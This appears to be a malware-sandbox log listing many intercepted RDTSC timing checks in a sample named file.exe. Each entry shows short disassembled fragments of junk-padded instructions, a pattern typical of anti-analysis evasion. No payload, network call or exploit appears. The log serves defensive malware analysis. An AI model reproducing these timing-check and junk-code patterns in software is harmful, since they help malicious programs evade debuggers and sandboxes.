Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF45E6 second address: CF4615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F4DCCCB3CD6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4DCCCB3CDBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF780D second address: CF7813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF70BC second address: CF70D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF70D8 second address: CF70DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF70DC second address: CF70E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF70E0 second address: CF7100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4DCCF8FBD2h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7100 second address: CF7106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7577 second address: CF757C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF419 second address: CFF451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4DCCCB3CD6h 0x0000000a jmp 00007F4DCCCB3CDDh 0x0000000f popad 0x00000010 jns 00007F4DCCCB3CD8h 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a popad 0x0000001b push edi 0x0000001c jmp 00007F4DCCCB3CDFh 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFD726 second address: CFD730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE253 second address: CFE271 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4DCCCB3CECh 0x0000000c jmp 00007F4DCCCB3CE0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE271 second address: CFE275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDEB second address: CFEDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4DCCCB3CD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDF5 second address: CFEE01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4DCCF8FBC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF121 second address: CFF12D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4DCCCB3CDEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D03011 second address: D03019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D02126 second address: D0213A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4DCCCB3CDAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F4DCCCB3CD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D022BE second address: D022E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F4DCCF8FBC6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D022E0 second address: D022FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4DCCCB3CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D022FB second address: D0230B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DCCF8FBD2h 0x00000008 jns 00007F4DCCF8FBC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D02450 second address: D0248D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F4DCCCB3CEAh 0x0000000b jmp 00007F4DCCCB3CE2h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F4DCCCB3CE2h 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F4DCCCB3CD6h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D025E1 second address: D025F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F4DCCF8FBC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D025F1 second address: D025F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D025F5 second address: D025FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D029D3 second address: D029E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4DCCCB3CDFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D029E7 second address: D02A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4DCCF8FBD8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D02CCF second address: D02CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D02CEC second address: D02CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D074FF second address: D0750D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0750D second address: D0752E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCF8FBCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F4DCCF8FBCFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0752E second address: D07542 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECC8 second address: D0ECCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECCE second address: D0ECD8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECD8 second address: D0ECDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECDD second address: D0ECE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECE6 second address: D0ECEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECEA second address: D0ECEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F10C second address: D0F110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F110 second address: D0F114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D101A0 second address: D101AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C619D5 second address: C619F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4DCCCB3CE5h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D23CFB second address: D23D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D23D01 second address: D23D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29F4B second address: D29F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29F51 second address: D29F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29F55 second address: D29F6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop eax 0x0000000f push edi 0x00000010 jbe 00007F4DCCF8FBCEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E6A3 second address: D2E6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E6A7 second address: D2E6AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E6AB second address: D2E6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3DAB5 second address: D3DABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3DABB second address: D3DACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F4DCCCB3CD6h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C373 second address: D3C392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C392 second address: D3C3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4DCCCB3CE0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jne 00007F4DCCCB3CD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C635 second address: D3C63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C63C second address: D3C643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C643 second address: D3C65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C65E second address: D3C662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3C7AB second address: D3C7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3CAC8 second address: D3CAF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DCCCB3CE5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3CAF4 second address: D3CAFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3CC38 second address: D3CC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3CC3C second address: D3CC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3CD80 second address: D3CD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D7F3 second address: D3D80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D80F second address: D3D81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D81A second address: D3D81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40FDD second address: D40FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jng 00007F4DCCCB3CF4h 0x0000000d pushad 0x0000000e jns 00007F4DCCCB3CD6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D41198 second address: D411BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4DCCF8FBD9h 0x00000008 jmp 00007F4DCCF8FBD1h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D411BC second address: D411D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4DCCCB3CE2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D411D3 second address: D411DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F4DCCF8FBC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CBD9 second address: D5CBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FB83 second address: D5FB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FB87 second address: D5FB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FB8D second address: D5FB97 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4DCCF8FBCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FB97 second address: D5FBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CE4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4DCCCB3CE2h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FBC9 second address: D5FBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FBCD second address: D5FBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79DB3 second address: D79DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78FFF second address: D79004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79004 second address: D7900A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7900A second address: D79012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79012 second address: D7901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D794A0 second address: D794A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D794A6 second address: D794C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F4DCCF8FBD3h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79A57 second address: D79A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C9D6 second address: D7C9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C9E1 second address: D7C9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C9E8 second address: D7CA15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4DCCF8FBC6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F4DCCF8FBD5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CA15 second address: D7CA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CA1B second address: D7CA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F4DCCF8FBCEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F470 second address: D7F476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80FC5 second address: D80FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80FCC second address: D80FE1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DCCCB3CDCh 0x00000008 jne 00007F4DCCCB3CD6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F700BE second address: 4F7010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4DCCF8FBD6h 0x0000000f push eax 0x00000010 jmp 00007F4DCCF8FBCBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F4DCCF8FBD6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7010F second address: 4F70115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70115 second address: 4F7011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7011B second address: 4F7011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6003A second address: 4F6006D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DCCF8FBCEh 0x00000008 xor si, 6428h 0x0000000d jmp 00007F4DCCF8FBCBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, esi 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6006D second address: 4F6008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 rdtsc
